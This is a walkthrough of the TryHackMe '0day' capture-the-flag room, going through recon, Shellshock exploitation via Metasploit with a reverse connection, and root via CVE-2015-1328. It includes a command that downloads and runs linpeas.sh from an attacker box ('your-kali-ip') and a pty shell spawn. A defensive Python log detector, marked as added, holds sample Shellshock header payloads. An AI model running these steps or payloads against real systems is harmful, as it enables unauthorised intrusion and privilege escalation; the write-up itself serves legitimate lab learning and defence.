Tryhackme — 0day Walkthrough
Welcome to this writeup for the tryhackme room “0day”. I really enjoyed solving this puzzle!
We start as always with an nmap scan and look for anything interesting.
We have ssh on port 22 running (OpenSSH 6.6.1p1 Ubuntu) and an apache webserver on port 80. Using the Firefox extension “Wappalyzer” we can figure out what kind of technology is in play.
We can see that there are some JavaScript functions involved, for example the JavaScript graphics library “particles.js” and some other stuff. After inspecting the source code with F12 or right-click → “View Page Source”, we find something interesting.
After googling a bit we came across the so-called “Subresource Integrity”, which can be a security risk, but is more of a rabbit hole here. Before starting the directory bruteforce, I always check for /robots.txt and well...
He got me with that one, lol. I’m doing the directory bruteforce with gobuster, dirsearch and dirbuster, but I’ll just show the gobuster output because it won’t help at all. I’m using the directory bruteforce (dir) option with the flag -u for the URI, the -w for the wordlist and -t 100 for 100 threads. I want to speed that up a bit after discovering that he’s trolling me, lol.
We found an interesting directory “/cgi-bin”, keep that in mind for later. Well, I jumped to /admin and /secret first, obviously. The /admin page won’t be displayed, and /secret looks like he wants to troll me again.
I immediately figured out that this is going to be a rabbit hole. Well, we could try some steganography at this point, but I expected far more from 0day than that. Well, I can’t say that the psychological component isn’t important as well. This is the point where I got stuck and looked for any hints. Let’s see what the room itself has to say about it.
I tried a lot of things at this point like searching for “hacking history”, googling some hacker groups containing “turtle” in the name and a lot more. After figuring out that I don’t know anything about turtles, I took a step back and tried a nikto scan. Don’t neglect that one, it could be painful for you. Nikto is basically a web application scanner and is pointed at a target with the -h flag for “host”. Nikto immediately found some useful information! If nikto says “I found something interesting”, yeah, then it IS really interesting.
We come back to “the history of hacking” with the discovery of the Shellshock vulnerability at /cgi-bin/test.cgi. After a bit of Google search, we can figure out that there’s a Metasploit exploit for it. Let’s take it easy and do it with Metasploit. We search for the correct exploit within Metasploit.
We set RHOST to the machine IP, LHOST to the attacker IP (which I misspelled in the first place, so be careful to type “LHOST”), LPORT to some random value like 4444 and, really important, TARGETURI to /cgi-bin/test.cgi. That’s how we can exploit the Shellshock vulnerability, which is basically a family of security bugs in the Unix Bash shell. For more details about it read this one: What is Shellshock and why does it matter?
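From the defender's side, the same weakness leaves a recognisable trace: Shellshock probes carry a Bash function-definition prefix in an HTTP header, and Apache's combined log records the Referer and User-Agent headers. The following detector is an added example (not part of the original walkthrough) that parses constructed combined-format log lines and flags that prefix, ranking hits against /cgi-bin/ paths higher.

```python
import re

# Apache "combined" log format; quoted fields may contain backslash-escaped quotes.
QUOTED = r'(?:[^"\\]|\\.)*'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>' + QUOTED + r')" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>' + QUOTED + r')" '
    r'"(?P<ua>' + QUOTED + r')"$'
)

# Function-definition prefix that the Shellshock family of bugs keys on;
# whitespace between the tokens varies between variants, so allow it.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample log lines for demonstration (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2020:12:00:01 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2020:12:00:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 145 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2020:12:00:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 145 "-" "() { :; }; echo test"',
    '10.0.0.9 - - [10/Oct/2020:12:00:04 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "() { :; }; echo test"',
]


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not combined format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """'cgi-target' when the prefix hits a CGI path, 'header-only' when it
    appears elsewhere, None when the logged headers look clean. Only the
    logged headers are inspected; a probe in e.g. Cookie is not in this log."""
    if not any(SHELLSHOCK_RE.search(entry[f]) for f in ("referer", "ua")):
        return None
    return "cgi-target" if "/cgi-bin/" in entry["req"] else "header-only"


def find_shellshock(lines):
    """Walk the log and collect (source ip, request line, classification) hits."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # unparsable line: skip rather than silently misclassify
        label = classify(entry)
        if label:
            hits.append((entry["ip"], entry["req"], label))
    return hits


if __name__ == "__main__":
    for ip, req, label in find_shellshock(SAMPLE_LOG):
        print(f"{label:11} {ip} {req}")
```

The header-only hits are still worth an alert: the same source is probing, and a CGI script the scanner has not reached yet may be just as exposed.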
After running it with “run” (or “exploit” if you wanna feel like a hacker), we get a reverse connection. Trying Metasploit commands like “hashdump” didn’t work, so I created a shell using the “shell” command.
I used the command (which can be found on https://gtfobins.github.io/ as well):
python -c 'import pty;pty.spawn("/bin/bash")'
to spawn a more stable shell. Now it’s time for privilege escalation, basically to get a root shell! Sometimes just typing “sudo -l” works, but not in this case. I looked at common places on Unix operating systems like /etc/crontab, /opt/, the home folder /home with /home/.secret and a lot more, but couldn’t find anything useful by myself.
With simply using
uname -a
you can figure out that this is a really old operating system. Or you do it the more complicated way with linpeas.sh like me. To transfer it, run the following command in the directory where linpeas.sh is
python -m SimpleHTTPServer 8000
on your attacker box and on the target box, download and execute it inside the /tmp folder by entering
cd /tmp
wget http://your-kali-ip:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
We get a yellow PE vector, which means it’s highly likely that we can use that to escalate our privileges.
After googling it, we find some juicy exploits. We used Metasploit before so why not use it again? Exit your current session with Ctrl+C and use
meterpreter > background
to background your current session (you need to remember the session ID later, so write it down. If you haven’t messed up it’s probably ID 1). Now we set up the options, most of them are again the same. Just make sure to choose the correct target ID by typing:
show targets
set target 0
The CVE (target option) we’re gonna use is CVE-2015-1328. By default, it’ll be target 1. Please change that before continuing.
Now the fun part begins!
Now we got a root shell. Collect the flags and finish this!
This was really enjoyable and a funny room! Thanks to 0day for creating this one. If you have any questions about this walkthrough, feel free to contact me at discord; PenTestical#1892.